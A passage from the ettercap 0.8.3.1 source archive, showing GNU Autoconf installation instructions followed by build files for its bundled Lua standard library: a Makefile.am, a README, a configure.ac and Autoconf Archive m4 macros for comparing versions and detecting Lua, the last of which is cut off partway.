for these options is expressed in terms of `${prefix}', so that specifying just `--prefix' will affect all of the other directory specifications that were not explicitly provided. The most portable way to affect installation locations is to pass the correct locations to `configure'; however, many packages provide one or both of the following shortcuts of passing variable assignments to the `make install' command line to change installation locations without having to reconfigure or recompile. The first method involves providing an override variable for each affected directory. For example, `make install prefix=/alternate/directory' will choose an alternate location for all directory configuration variables that were expressed in terms of `${prefix}'. Any directories that were specified during `configure', but not in terms of `${prefix}', must each be overridden at install time for the entire installation to be relocated. The approach of makefile variable overrides for each directory variable is required by the GNU Coding Standards, and ideally causes no recompilation. However, some platforms have known limitations with the semantics of shared libraries that end up requiring recompilation when using this method, particularly noticeable in packages that use GNU Libtool. The second method involves providing the `DESTDIR' variable. For example, `make install DESTDIR=/alternate/directory' will prepend `/alternate/directory' before all installation names. The approach of `DESTDIR' overrides is not required by the GNU Coding Standards, and does not work on platforms that have drive letters. On the other hand, it does better at avoiding recompilation issues, and works well even when some directory options were not specified in terms of `${prefix}' at `configure' time. Optional Features ================= If the package supports it, you can cause programs to be installed with an extra prefix or suffix on their names by giving `configure' the option `--program-prefix=PREFIX' or `--program-suffix=SUFFIX'. Some packages pay attention to `--enable-FEATURE' options to `configure', where FEATURE indicates an optional part of the package. They may also pay attention to `--with-PACKAGE' options, where PACKAGE is something like `gnu-as' or `x' (for the X Window System). The `README' should mention any `--enable-' and `--with-' options that the package recognizes. For packages that use the X Window System, `configure' can usually find the X include and library files automatically, but if it doesn't, you can use the `configure' options `--x-includes=DIR' and `--x-libraries=DIR' to specify their locations. Some packages offer the ability to configure how verbose the execution of `make' will be. For these packages, running `./configure --enable-silent-rules' sets the default to minimal output, which can be overridden with `make V=1'; while running `./configure --disable-silent-rules' sets the default to verbose, which can be overridden with `make V=0'. Particular systems ================== On HP-UX, the default C compiler is not ANSI C compatible. If GNU CC is not installed, it is recommended to use the following options in order to use an ANSI C compiler: ./configure CC="cc -Ae -D_XOPEN_SOURCE=500" and if that doesn't work, install pre-built binaries of GCC for HP-UX. On OSF/1 a.k.a. Tru64, some versions of the default C compiler cannot parse its `' header file. The option `-nodtk' can be used as a workaround. If GNU CC is not installed, it is therefore recommended to try ./configure CC="cc" and if that doesn't work, try ./configure CC="cc -nodtk" On Solaris, don't put `/usr/ucb' early in your `PATH'. This directory contains several dysfunctional programs; working variants of these programs are available in `/usr/bin'. So, if you need `/usr/ucb' in your `PATH', put it _after_ `/usr/bin'. On Haiku, software installed for all users goes in `/boot/common', not `/usr/local'. It is recommended to use the following options: ./configure --prefix=/boot/common Specifying the System Type ========================== There may be some features `configure' cannot figure out automatically, but needs to determine by the type of machine the package will run on. Usually, assuming the package is built to be run on the _same_ architectures, `configure' can figure that out, but if it prints a message saying it cannot guess the machine type, give it the `--build=TYPE' option. TYPE can either be a short name for the system type, such as `sun4', or a canonical name which has the form: CPU-COMPANY-SYSTEM where SYSTEM can have one of these forms: OS KERNEL-OS See the file `config.sub' for the possible values of each field. If `config.sub' isn't included in this package, then this package doesn't need to know the machine type. If you are _building_ compiler tools for cross-compiling, you should use the option `--target=TYPE' to select the type of system they will produce code for. If you want to _use_ a cross compiler, that generates code for a platform different from the build platform, you should specify the "host" platform (i.e., that on which the generated programs will eventually be run) with `--host=TYPE'. Sharing Defaults ================ If you want to set default values for `configure' scripts to share, you can create a site shell script called `config.site' that gives default values for variables like `CC', `cache_file', and `prefix'. `configure' looks for `PREFIX/share/config.site' if it exists, then `PREFIX/etc/config.site' if it exists. Or, you can set the `CONFIG_SITE' environment variable to the location of the site script. A warning: not all `configure' scripts look for a site script. Defining Variables ================== Variables not defined in a site shell script can be set in the environment passed to `configure'. However, some packages may run configure again during the build, and the customized values of these variables may be lost. In order to avoid this problem, you should set them in the `configure' command line, using `VAR=value'. For example: ./configure CC=/usr/local2/bin/gcc causes the specified `gcc' to be used as the C compiler (unless it is overridden in the site shell script). Unfortunately, this technique does not work for `CONFIG_SHELL' due to an Autoconf bug. Until the bug is fixed you can use this workaround: CONFIG_SHELL=/bin/bash /bin/bash ./configure CONFIG_SHELL=/bin/bash `configure' Invocation ====================== `configure' recognizes the following options to control how it operates. `--help' `-h' Print a summary of all of the options to `configure', and exit. `--help=short' `--help=recursive' Print a summary of the options unique to this package's `configure', and exit. The `short' variant lists options used only in the top level, while the `recursive' variant lists options also present in any nested packages. `--version' `-V' Print the version of Autoconf used to generate the `configure' script, and exit. `--cache-file=FILE' Enable the cache: use and save the results of the tests in FILE, traditionally `config.cache'. FILE defaults to `/dev/null' to disable caching. `--config-cache' `-C' Alias for `--cache-file=config.cache'. `--quiet' `--silent' `-q' Do not print messages saying which checks are being made. To suppress all normal output, redirect it to `/dev/null' (any error messages will still be shown). `--srcdir=DIR' Look for the package's source code in directory DIR. Usually `configure' can determine that directory automatically. `--prefix=DIR' Use DIR as the installation prefix. *note Installation Names:: for more details, including other options available for fine-tuning the installation locations. `--no-create' `-n' Run the configure checks, but stop before creating any output files. `configure' also accepts some other, not widely useful, options. Run `configure --help' for more details. ettercap-0.8.3.1/src/lua/share/third-party/stdlib/Makefile.am000664 000000 000000 00000004042 13711276346 023720 0ustar00rootroot000000 000000 ## Process this file with automake to produce Makefile.in ACLOCAL_AMFLAGS = -I m4 src_spec = $(abs_srcdir)/src/?.lua LUA_PATH ?= ; LUA_ENV = LUA_PATH="$(src_spec);$(LUA_PATH)" SPEC_ENV = LUA_PATH="$(src_spec);$(LUA_PATH)" SPECL_MIN = 3 NOTHING_ELSE = SOURCES = \ src/base.lua \ src/bin.lua \ src/debug_ext.lua \ src/debug_init.lua \ src/fstable.lua \ src/getopt.lua \ src/io_ext.lua \ src/lcs.lua \ src/list.lua \ src/math_ext.lua \ src/mbox.lua \ src/modules.lua \ src/object.lua \ src/package_ext.lua \ src/parser.lua \ src/set.lua \ src/std.lua \ src/strbuf.lua \ src/strict.lua \ src/string_ext.lua \ src/table_ext.lua \ src/tree.lua \ src/xml.lua \ $(NOTHING_ELSE) SPECS = \ $(srcdir)/specs/getopt_spec.yaml \ $(srcdir)/specs/package_ext_spec.yaml \ $(srcdir)/specs/string_ext_spec.yaml \ $(srcdir)/specs/table_ext_spec.yaml \ $(NOTHING_ELSE) dist_data_DATA = $(SOURCES) dist_doc_DATA = \ $(top_srcdir)/src/index.html \ $(top_srcdir)/src/luadoc.css filesdir = $(docdir)/files dist_files_DATA = $(wildcard $(top_srcdir)/src/files/*.html) modulesdir = $(docdir)/modules dist_modules_DATA = $(wildcard $(top_srcdir)/src/modules/*.html) EXTRA_DIST = \ src/std.lua.in \ GNUmakefile \ $(SPECS) \ $(NOTHING_ELSE) DISTCLEANFILES = $(PACKAGE).rockspec # In order to avoid regenerating std.lua at configure time, which # causes the documentation to be rebuilt and hence requires users to # have luadoc installed, put src/std.lua in as a Makefile dependency. # (Strictly speaking, distributing an AC_CONFIG_FILE would be wrong.) src/std.lua: src/std.lua.in ./config.status --file=$@ $(dist_doc_DATA): $(SOURCES) cd src && $(LUADOC) *.lua check-local: @v=`specl --version | sed -e 's|^.* ||' -e 1q`; \ if test "$$v" -lt "$(SPECL_MIN)"; then \ echo "ERROR: Specl version $$v is too old, please upgrade to at least version $(SPECL_MIN),";\ echo "ERROR: and rerun \`make check\`"; \ exit 1; \ else \ $(SPEC_ENV) specl $(SPECL_OPTS) $(SPECS); \ fi ettercap-0.8.3.1/src/lua/share/third-party/stdlib/README000664 000000 000000 00000002341 13711276346 022544 0ustar00rootroot000000 000000 Standard Lua libraries ---------------------- by the stdlib project (http://github.com/rrthomas/lua-stdlib/) This is a collection of Lua libraries for Lua 5.1 and 5.2. The libraries are copyright by their authors 2000-2013 (see the AUTHORS file for details), and released under the MIT license (the same license as Lua itself). There is no warranty. The standard subset of stdlib has no prerequisites beyond a standard Lua system. The following modules have extra dependencies: fstable: Lua 5.2, lfs, luaposix Installation ------------ The simplest way to install stdlib is with LuaRocks (http://www.luarocks.org/ ): luarocks install stdlib Use --- As well as requiring individual libraries, you can load the standard set with require "std" Modules not in the standard set may be removed from future versions of stdlib. Documentation ------------- The libraries are documented in LuaDoc. Pre-built HTML files are included. Bug reports and code contributions ---------------------------------- These libraries are maintained and extended by their users. Please make bug report and suggestions on GitHub (see URL at top of file). Pull requests are especially appreciated. ettercap-0.8.3.1/src/lua/share/third-party/stdlib/configure.ac000664 000000 000000 00000000657 13711276346 024162 0ustar00rootroot000000 000000 dnl Process this file with autoconf to produce a configure script dnl Initialise autoconf and automake AC_INIT(stdlib, 34, rrt@sc3d.org) AC_CONFIG_AUX_DIR([build-aux]) AM_INIT_AUTOMAKE([foreign]) AM_SILENT_RULES([yes]) dnl Lua AC_SUBST([LUA_MIN_VERSION], [5.1]) AX_PROG_LUA([$LUA_MIN_VERSION], [5.3]) AX_WITH_PROG([LUADOC], [luadoc], [:]) dnl Generate output files AC_CONFIG_MACRO_DIR(m4) AC_CONFIG_FILES([Makefile]) AC_OUTPUT ettercap-0.8.3.1/src/lua/share/third-party/stdlib/m4/000775 000000 000000 00000000000 13711276346 022204 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/third-party/stdlib/m4/ax_compare_version.m4000664 000000 000000 00000014652 13711276346 026341 0ustar00rootroot000000 000000 # =========================================================================== # http://www.gnu.org/software/autoconf-archive/ax_compare_version.html # =========================================================================== # # SYNOPSIS # # AX_COMPARE_VERSION(VERSION_A, OP, VERSION_B, [ACTION-IF-TRUE], [ACTION-IF-FALSE]) # # DESCRIPTION # # This macro compares two version strings. Due to the various number of # minor-version numbers that can exist, and the fact that string # comparisons are not compatible with numeric comparisons, this is not # necessarily trivial to do in a autoconf script. This macro makes doing # these comparisons easy. # # The six basic comparisons are available, as well as checking equality # limited to a certain number of minor-version levels. # # The operator OP determines what type of comparison to do, and can be one # of: # # eq - equal (test A == B) # ne - not equal (test A != B) # le - less than or equal (test A <= B) # ge - greater than or equal (test A >= B) # lt - less than (test A < B) # gt - greater than (test A > B) # # Additionally, the eq and ne operator can have a number after it to limit # the test to that number of minor versions. # # eq0 - equal up to the length of the shorter version # ne0 - not equal up to the length of the shorter version # eqN - equal up to N sub-version levels # neN - not equal up to N sub-version levels # # When the condition is true, shell commands ACTION-IF-TRUE are run, # otherwise shell commands ACTION-IF-FALSE are run. The environment # variable 'ax_compare_version' is always set to either 'true' or 'false' # as well. # # Examples: # # AX_COMPARE_VERSION([3.15.7],[lt],[3.15.8]) # AX_COMPARE_VERSION([3.15],[lt],[3.15.8]) # # would both be true. # # AX_COMPARE_VERSION([3.15.7],[eq],[3.15.8]) # AX_COMPARE_VERSION([3.15],[gt],[3.15.8]) # # would both be false. # # AX_COMPARE_VERSION([3.15.7],[eq2],[3.15.8]) # # would be true because it is only comparing two minor versions. # # AX_COMPARE_VERSION([3.15.7],[eq0],[3.15]) # # would be true because it is only comparing the lesser number of minor # versions of the two values. # # Note: The characters that separate the version numbers do not matter. An # empty string is the same as version 0. OP is evaluated by autoconf, not # configure, so must be a string, not a variable. # # The author would like to acknowledge Guido Draheim whose advice about # the m4_case and m4_ifvaln functions make this macro only include the # portions necessary to perform the specific comparison specified by the # OP argument in the final configure script. # # LICENSE # # Copyright (c) 2008 Tim Toolan # # Copying and distribution of this file, with or without modification, are # permitted in any medium without royalty provided the copyright notice # and this notice are preserved. This file is offered as-is, without any # warranty. #serial 11 dnl ######################################################################### AC_DEFUN([AX_COMPARE_VERSION], [ AC_REQUIRE([AC_PROG_AWK]) # Used to indicate true or false condition ax_compare_version=false # Convert the two version strings to be compared into a format that # allows a simple string comparison. The end result is that a version # string of the form 1.12.5-r617 will be converted to the form # 0001001200050617. In other words, each number is zero padded to four # digits, and non digits are removed. AS_VAR_PUSHDEF([A],[ax_compare_version_A]) A=`echo "$1" | sed -e 's/\([[0-9]]*\)/Z\1Z/g' \ -e 's/Z\([[0-9]]\)Z/Z0\1Z/g' \ -e 's/Z\([[0-9]][[0-9]]\)Z/Z0\1Z/g' \ -e 's/Z\([[0-9]][[0-9]][[0-9]]\)Z/Z0\1Z/g' \ -e 's/[[^0-9]]//g'` AS_VAR_PUSHDEF([B],[ax_compare_version_B]) B=`echo "$3" | sed -e 's/\([[0-9]]*\)/Z\1Z/g' \ -e 's/Z\([[0-9]]\)Z/Z0\1Z/g' \ -e 's/Z\([[0-9]][[0-9]]\)Z/Z0\1Z/g' \ -e 's/Z\([[0-9]][[0-9]][[0-9]]\)Z/Z0\1Z/g' \ -e 's/[[^0-9]]//g'` dnl # In the case of le, ge, lt, and gt, the strings are sorted as necessary dnl # then the first line is used to determine if the condition is true. dnl # The sed right after the echo is to remove any indented white space. m4_case(m4_tolower($2), [lt],[ ax_compare_version=`echo "x$A x$B" | sed 's/^ *//' | sort -r | sed "s/x${A}/false/;s/x${B}/true/;1q"` ], [gt],[ ax_compare_version=`echo "x$A x$B" | sed 's/^ *//' | sort | sed "s/x${A}/false/;s/x${B}/true/;1q"` ], [le],[ ax_compare_version=`echo "x$A x$B" | sed 's/^ *//' | sort | sed "s/x${A}/true/;s/x${B}/false/;1q"` ], [ge],[ ax_compare_version=`echo "x$A x$B" | sed 's/^ *//' | sort -r | sed "s/x${A}/true/;s/x${B}/false/;1q"` ],[ dnl Split the operator from the subversion count if present. m4_bmatch(m4_substr($2,2), [0],[ # A count of zero means use the length of the shorter version. # Determine the number of characters in A and B. ax_compare_version_len_A=`echo "$A" | $AWK '{print(length)}'` ax_compare_version_len_B=`echo "$B" | $AWK '{print(length)}'` # Set A to no more than B's length and B to no more than A's length. A=`echo "$A" | sed "s/\(.\{$ax_compare_version_len_B\}\).*/\1/"` B=`echo "$B" | sed "s/\(.\{$ax_compare_version_len_A\}\).*/\1/"` ], [[0-9]+],[ # A count greater than zero means use only that many subversions A=`echo "$A" | sed "s/\(\([[0-9]]\{4\}\)\{m4_substr($2,2)\}\).*/\1/"` B=`echo "$B" | sed "s/\(\([[0-9]]\{4\}\)\{m4_substr($2,2)\}\).*/\1/"` ], [.+],[ AC_WARNING( [illegal OP numeric parameter: $2]) ],[]) # Pad zeros at end of numbers to make same length. ax_compare_version_tmp_A="$A`echo $B | sed 's/./0/g'`" B="$B`echo $A | sed 's/./0/g'`" A="$ax_compare_version_tmp_A" # Check for equality or inequality as necessary. m4_case(m4_tolower(m4_substr($2,0,2)), [eq],[ test "x$A" = "x$B" && ax_compare_version=true ], [ne],[ test "x$A" != "x$B" && ax_compare_version=true ],[ AC_WARNING([illegal OP parameter: $2]) ]) ]) AS_VAR_POPDEF([A])dnl AS_VAR_POPDEF([B])dnl dnl # Execute ACTION-IF-TRUE / ACTION-IF-FALSE. if test "$ax_compare_version" = "true" ; then m4_ifvaln([$4],[$4],[:])dnl m4_ifvaln([$5],[else $5])dnl fi ]) dnl AX_COMPARE_VERSION ettercap-0.8.3.1/src/lua/share/third-party/stdlib/m4/ax_lua.m4000664 000000 000000 00000057713 13711276346 023734 0ustar00rootroot000000 000000 # =========================================================================== # http://www.gnu.org/software/autoconf-archive/ax_lua.html # =========================================================================== # # SYNOPSIS # # AX_PROG_LUA[([MINIMUM-VERSION], [TOO-BIG-VERSION], [ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND])] # AX_LUA_HEADERS[([ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND])] # AX_LUA_LIBS[([ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND])] # AX_LUA_READLINE[([ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND])] # # DESCRIPTION # # Detect a Lua interpreter, optionally specifying a minimum and maximum # version number. Set up important Lua paths, such as the directories in # which to install scripts and modules (shared libraries). # # Also detect Lua headers and libraries. The Lua version contained in the # header is checked to match the Lua interpreter version exactly. When # searching for Lua libraries, the version number is used as a suffix. # This is done with the goal of supporting multiple Lua installs (5.1 and # 5.2 side-by-side). # # A note on compatibility with previous versions: This file has been # mostly rewritten for serial 18. Most developers should be able to use # these macros without needing to modify configure.ac. Care has been taken # to preserve each macro's behavior, but there are some differences: # # 1) AX_WITH_LUA is deprecated; it now expands to the exact same thing as # AX_PROG_LUA with no arguments. # # 2) AX_LUA_HEADERS now checks that the version number defined in lua.h # matches the interpreter version. AX_LUA_HEADERS_VERSION is therefore # unnecessary, so it is deprecated and does not expand to anything. # # 3) The configure flag --with-lua-suffix no longer exists; the user # should instead specify the LUA precious variable on the command line. # See the AX_PROG_LUA description for details. # # Please read the macro descriptions below for more information. # # This file was inspired by Andrew Dalke's and James Henstridge's # python.m4 and Tom Payne's, Matthieu Moy's, and Reuben Thomas's ax_lua.m4 # (serial 17). Basically, this file is a mash-up of those two files. I # like to think it combines the best of the two! # # AX_PROG_LUA: Search for the Lua interpreter, and set up important Lua # paths. Adds precious variable LUA, which may contain the path of the Lua # interpreter. If LUA is blank, the user's path is searched for an # suitable interpreter. # # If MINIMUM-VERSION is supplied, then only Lua interpreters with a # version number greater or equal to MINIMUM-VERSION will be accepted. If # TOO-BIG- VERSION is also supplied, then only Lua interpreters with a # version number greater or equal to MINIMUM-VERSION and less than # TOO-BIG-VERSION will be accepted. # # Version comparisons require the AX_COMPARE_VERSION macro, which is # provided by ax_compare_version.m4 from the Autoconf Archive. # # The Lua version number, LUA_VERSION, is found from the interpreter, and # substituted. LUA_PLATFORM is also found, but not currently supported (no # standard representation). # # Finally, the macro finds four paths: # # luadir Directory to install Lua scripts. # pkgluadir $luadir/$PACKAGE # luaexecdir Directory to install Lua modules. # pkgluaexecdir $luaexecdir/$PACKAGE # # These paths a found based on $prefix, $exec_prefix, Lua's package.path, # and package.cpath. The first path of package.path beginning with $prefix # is selected as luadir. The first path of package.cpath beginning with # $exec_prefix is used as luaexecdir. This should work on all reasonable # Lua installations. If a path cannot be determined, a default path is # used. Of course, the user can override these later when invoking make. # # luadir Default: $prefix/share/lua/$LUA_VERSION # luaexecdir Default: $exec_prefix/lib/lua/$LUA_VERSION # # These directories can be used by Automake as install destinations. The # variable name minus 'dir' needs to be used as a prefix to the # appropriate Automake primary, e.g. lua_SCRIPS or luaexec_LIBRARIES. # # If an acceptable Lua interpreter is found, then ACTION-IF-FOUND is # performed, otherwise ACTION-IF-NOT-FOUND is preformed. If ACTION-IF-NOT- # FOUND is blank, then it will default to printing an error. To prevent # the default behavior, give ':' as an action. # # AX_LUA_HEADERS: Search for Lua headers. Requires that AX_PROG_LUA be # expanded before this macro. Adds precious variable LUA_INCLUDE, which # may contain Lua specific include flags, e.g. -I/usr/include/lua5.1. If # LUA_INCLUDE is blank, then this macro will attempt to find suitable # flags. # # LUA_INCLUDE can be used by Automake to compile Lua modules or # executables with embedded interpreters. The *_CPPFLAGS variables should # be used for this purpose, e.g. myprog_CPPFLAGS = $(LUA_INCLUDE). # # This macro searches for the header lua.h (and others). The search is # performed with a combination of CPPFLAGS, CPATH, etc, and LUA_INCLUDE. # If the search is unsuccessful, then some common directories are tried. # If the headers are then found, then LUA_INCLUDE is set accordingly. # # The paths automatically searched are: # # * /usr/include/luaX.Y # * /usr/include/lua/X.Y # * /usr/include/luaXY # * /usr/local/include/luaX.Y # * /usr/local/include/lua/X.Y # * /usr/local/include/luaXY # # (Where X.Y is the Lua version number, e.g. 5.1.) # # The Lua version number found in the headers is always checked to match # the Lua interpreter's version number. Lua headers with mismatched # version numbers are not accepted. # # If headers are found, then ACTION-IF-FOUND is performed, otherwise # ACTION-IF-NOT-FOUND is performed. If ACTION-IF-NOT-FOUND is blank, then # it will default to printing an error. To prevent the default behavior, # set the action to ':'. # # AX_LUA_LIBS: Search for Lua libraries. Requires that AX_PROG_LUA be # expanded before this macro. Adds precious variable LUA_LIB, which may # contain Lua specific linker flags, e.g. -llua5.1. If LUA_LIB is blank, # then this macro will attempt to find suitable flags. # # LUA_LIB can be used by Automake to link Lua modules or executables with # embedded interpreters. The *_LIBADD and *_LDADD variables should be used # for this purpose, e.g. mymod_LIBADD = $(LUA_LIB). # # This macro searches for the Lua library. More technically, it searches # for a library containing the function lua_load. The search is performed # with a combination of LIBS, LIBRARY_PATH, and LUA_LIB. # # If the search determines that some linker flags are missing, then those # flags will be added to LUA_LIB. # # If libraries are found, then ACTION-IF-FOUND is performed, otherwise # ACTION-IF-NOT-FOUND is performed. If ACTION-IF-NOT-FOUND is blank, then # it will default to printing an error. To prevent the default behavior, # set the action to ':'. # # AX_LUA_READLINE: Search for readline headers and libraries. Requires the # AX_LIB_READLINE macro, which is provided by ax_lib_readline.m4 from the # Autoconf Archive. # # If a readline compatible library is found, then ACTION-IF-FOUND is # performed, otherwise ACTION-IF-NOT-FOUND is performed. # # LICENSE # # Copyright (c) 2013 Tim Perkins # Copyright (c) 2013 Reuben Thomas # # This program is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation, either version 3 of the License, or (at your # option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General # Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program. If not, see . # # As a special exception, the respective Autoconf Macro's copyright owner # gives unlimited permission to copy, distribute and modify the configure # scripts that are the output of Autoconf when processing the Macro. You # need not follow the terms of the GNU General Public License when using # or distributing such scripts, even though portions of the text of the # Macro appear in them. The GNU General Public License (GPL) does govern # all other use of the material that constitutes the Autoconf Macro. # # This special exception to the GPL applies to versions of the Autoconf # Macro released by the Autoconf Archive. When you make and distribute a # modified version of the Autoconf Macro, you may extend this special # exception to the GPL to apply to your modified version as well. #serial 20 dnl ========================================================================= dnl AX_PROG_LUA([MINIMUM-VERSION], [TOO-BIG-VERSION], dnl [ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) dnl ========================================================================= AC_DEFUN([AX_PROG_LUA], [ dnl Make LUA a precious variable. AC_ARG_VAR([LUA], [The Lua interpreter, e.g. /usr/bin/lua5.1]) dnl Find a Lua interpreter. m4_define_default([_AX_LUA_INTERPRETER_LIST], [lua lua5.2 lua5.1 lua50]) m4_if([$1], [], [ dnl No version check is needed. Find any Lua interpreter. AS_IF([test "x$LUA" = 'x'], [AC_PATH_PROGS([LUA], [_AX_LUA_INTERPRETER_LIST], [:])]) ax_display_LUA='lua' dnl At least check if this is a Lua interpreter. AC_MSG_CHECKING([if $LUA is a Lua interpreter]) _AX_LUA_CHK_IS_INTRP([$LUA], [AC_MSG_RESULT([yes])], [ AC_MSG_RESULT([no]) AC_MSG_ERROR([not a Lua interpreter]) ]) ], [ dnl A version check is needed. AS_IF([test "x$LUA" != 'x'], [ dnl Check if this is a Lua interpreter. AC_MSG_CHECKING([if $LUA is a Lua interpreter]) _AX_LUA_CHK_IS_INTRP([$LUA], [AC_MSG_RESULT([yes])], [ AC_MSG_RESULT([no]) AC_MSG_ERROR([not a Lua interpreter]) ]) dnl Check the version. m4_if([$2], [], [_ax_check_text="whether $LUA version >= $1"], [_ax_check_text="whether $LUA version >= $1, < $2"]) AC_MSG_CHECKING([$_ax_check_text]) _AX_LUA_CHK_VER([$LUA], [$1], [$2], [AC_MSG_RESULT([yes])], [ AC_MSG_RESULT([no]) AC_MSG_ERROR([version is out of range for specified LUA])]) ax_display_LUA=$LUA ], [ dnl Try each interpreter until we find one that satisfies VERSION. m4_if([$2], [], [_ax_check_text="for a Lua interpreter with version >= $1"], [_ax_check_text="for a Lua interpreter with version >= $1, < $2"]) AC_CACHE_CHECK([$_ax_check_text], [ax_cv_pathless_LUA], [ for ax_cv_pathless_LUA in _AX_LUA_INTERPRETER_LIST none; do test "x$ax_cv_pathless_LUA" = 'xnone' && break _AX_LUA_CHK_IS_INTRP([$ax_cv_pathless_LUA], [], [continue]) _AX_LUA_CHK_VER([$ax_cv_pathless_LUA], [$1], [$2], [break]) done ]) dnl Set $LUA to the absolute path of $ax_cv_pathless_LUA. AS_IF([test "x$ax_cv_pathless_LUA" = 'xnone'], [LUA=':'], [AC_PATH_PROG([LUA], [$ax_cv_pathless_LUA])]) ax_display_LUA=$ax_cv_pathless_LUA ]) ]) AS_IF([test "x$LUA" = 'x:'], [ dnl Run any user-specified action, or abort. m4_default([$4], [AC_MSG_ERROR([cannot find suitable Lua interpreter])]) ], [ dnl Query Lua for its version number. AC_CACHE_CHECK([for $ax_display_LUA version], [ax_cv_lua_version], [ ax_cv_lua_version=`$LUA -e "print(_VERSION)" | \ sed "s|^Lua \(.*\)|\1|" | \ grep -o "^@<:@0-9@:>@\+\\.@<:@0-9@:>@\+"` ]) AS_IF([test "x$ax_cv_lua_version" = 'x'], [AC_MSG_ERROR([invalid Lua version number])]) AC_SUBST([LUA_VERSION], [$ax_cv_lua_version]) AC_SUBST([LUA_SHORT_VERSION], [`echo "$LUA_VERSION" | sed 's|\.||'`]) dnl The following check is not supported: dnl At times (like when building shared libraries) you may want to know dnl which OS platform Lua thinks this is. AC_CACHE_CHECK([for $ax_display_LUA platform], [ax_cv_lua_platform], [ax_cv_lua_platform=`$LUA -e "print('unknown')"`]) AC_SUBST([LUA_PLATFORM], [$ax_cv_lua_platform]) dnl Use the values of $prefix and $exec_prefix for the corresponding dnl values of LUA_PREFIX and LUA_EXEC_PREFIX. These are made distinct dnl variables so they can be overridden if need be. However, the general dnl consensus is that you shouldn't need this ability. AC_SUBST([LUA_PREFIX], ['${prefix}']) AC_SUBST([LUA_EXEC_PREFIX], ['${exec_prefix}']) dnl Lua provides no way to query the script directory, and instead dnl provides LUA_PATH. However, we should be able to make a safe educated dnl guess. If the built-in search path contains a directory which is dnl prefixed by $prefix, then we can store scripts there. The first dnl matching path will be used. AC_CACHE_CHECK([for $ax_display_LUA script directory], [ax_cv_lua_luadir], [ AS_IF([test "x$prefix" = 'xNONE'], [ax_lua_prefix=$ac_default_prefix], [ax_lua_prefix=$prefix]) dnl Initialize to the default path. ax_cv_lua_luadir="$LUA_PREFIX/share/lua/$LUA_VERSION" dnl Try to find a path with the prefix. _AX_LUA_FND_PRFX_PTH([$LUA], [$ax_lua_prefix], [package.path]) AS_IF([test "x$ax_lua_prefixed_path" != 'x'], [ dnl Fix the prefix. _ax_strip_prefix=`echo "$ax_lua_prefix" | sed 's|.|.|g'` ax_cv_lua_luadir=`echo "$ax_lua_prefixed_path" | \ sed "s,^$_ax_strip_prefix,$LUA_PREFIX,"` ]) ]) AC_SUBST([luadir], [$ax_cv_lua_luadir]) AC_SUBST([pkgluadir], [\${luadir}/$PACKAGE]) dnl Lua provides no way to query the module directory, and instead dnl provides LUA_PATH. However, we should be able to make a safe educated dnl guess. If the built-in search path contains a directory which is dnl prefixed by $exec_prefix, then we can store modules there. The first dnl matching path will be used. AC_CACHE_CHECK([for $ax_display_LUA module directory], [ax_cv_lua_luaexecdir], [ AS_IF([test "x$exec_prefix" = 'xNONE'], [ax_lua_exec_prefix=$ax_lua_prefix], [ax_lua_exec_prefix=$exec_prefix]) dnl Initialize to the default path. ax_cv_lua_luaexecdir="$LUA_EXEC_PREFIX/lib/lua/$LUA_VERSION" dnl Try to find a path with the prefix. _AX_LUA_FND_PRFX_PTH([$LUA], [$ax_lua_exec_prefix], [package.cpathd]) AS_IF([test "x$ax_lua_prefixed_path" != 'x'], [ dnl Fix the prefix. _ax_strip_prefix=`echo "$ax_lua_exec_prefix" | sed 's|.|.|g'` ax_cv_lua_luaexecdir=`echo "$ax_lua_prefixed_path" | \ sed "s,^$_ax_strip_prefix,$LUA_EXEC_PREFIX,"` ]) ]) AC_SUBST([luaexecdir], [$ax_cv_lua_luaexecdir]) AC_SUBST([pkgluaexecdir], [\${luaexecdir}/$PACKAGE]) dnl Run any user specified action. $3 ]) ]) dnl AX_WITH_LUA is now the same thing as AX_PROG_LUA. AC_DEFUN([AX_WITH_LUA], [ AC_MSG_WARN([[$0 is deprecated, please use AX_PROG_LUA]]) AX_PROG_LUA ]) dnl ========================================================================= dnl _AX_LUA_CHK_IS_INTRP(PROG, [ACTION-IF-TRUE], [ACTION-IF-FALSE]) dnl ========================================================================= AC_DEFUN([_AX_LUA_CHK_IS_INTRP], [ dnl Just print _VERSION because all Lua interpreters have this global. AS_IF([$1 -e "print('Hello ' .. _VERSION .. '!')" &>/dev/null], [$2], [$3]) ]) dnl ========================================================================= dnl _AX_LUA_CHK_VER(PROG, MINIMUM-VERSION, [TOO-BIG-VERSION], dnl [ACTION-IF-TRUE], [ACTION-IF-FALSE]) dnl ========================================================================= AC_DEFUN([_AX_LUA_CHK_VER], [ _ax_test_ver=`$1 -e "print(_VERSION)" 2>/dev/null | \ sed "s|^Lua \(.*\)|\1|" | grep -o "^@<:@0-9@:>@\+\\.@<:@0-9@:>@\+"` AS_IF([test "x$_ax_test_ver" = 'x'], [_ax_test_ver='0']) AX_COMPARE_VERSION([$_ax_test_ver], [ge], [$2]) m4_if([$3], [], [], [ AS_IF([$ax_compare_version], [AX_COMPARE_VERSION([$_ax_test_ver], [lt], [$3])]) ]) AS_IF([$ax_compare_version], [$4], [$5]) ]) dnl ========================================================================= dnl _AX_LUA_FND_PRFX_PTH(PROG, PREFIX, LUA-PATH-VARIABLE) dnl ========================================================================= AC_DEFUN([_AX_LUA_FND_PRFX_PTH], [ dnl Invokes the Lua interpreter PROG to print the path variable dnl LUA-PATH-VARIABLE, usually package.path or package.cpath. Paths are dnl then matched against PREFIX. The first path to begin with PREFIX is set dnl to ax_lua_prefixed_path. ax_lua_prefixed_path='' _ax_package_paths=`$1 -e 'print($3)' 2>/dev/null | sed 's|;|\n|g'` dnl Try the paths in order, looking for the prefix. for _ax_package_path in $_ax_package_paths; do dnl Copy the path, up to the use of a Lua wildcard. _ax_path_parts=`echo "$_ax_package_path" | sed 's|/|\n|g'` _ax_reassembled='' for _ax_path_part in $_ax_path_parts; do echo "$_ax_path_part" | grep '\?' >/dev/null && break _ax_reassembled="$_ax_reassembled/$_ax_path_part" done dnl 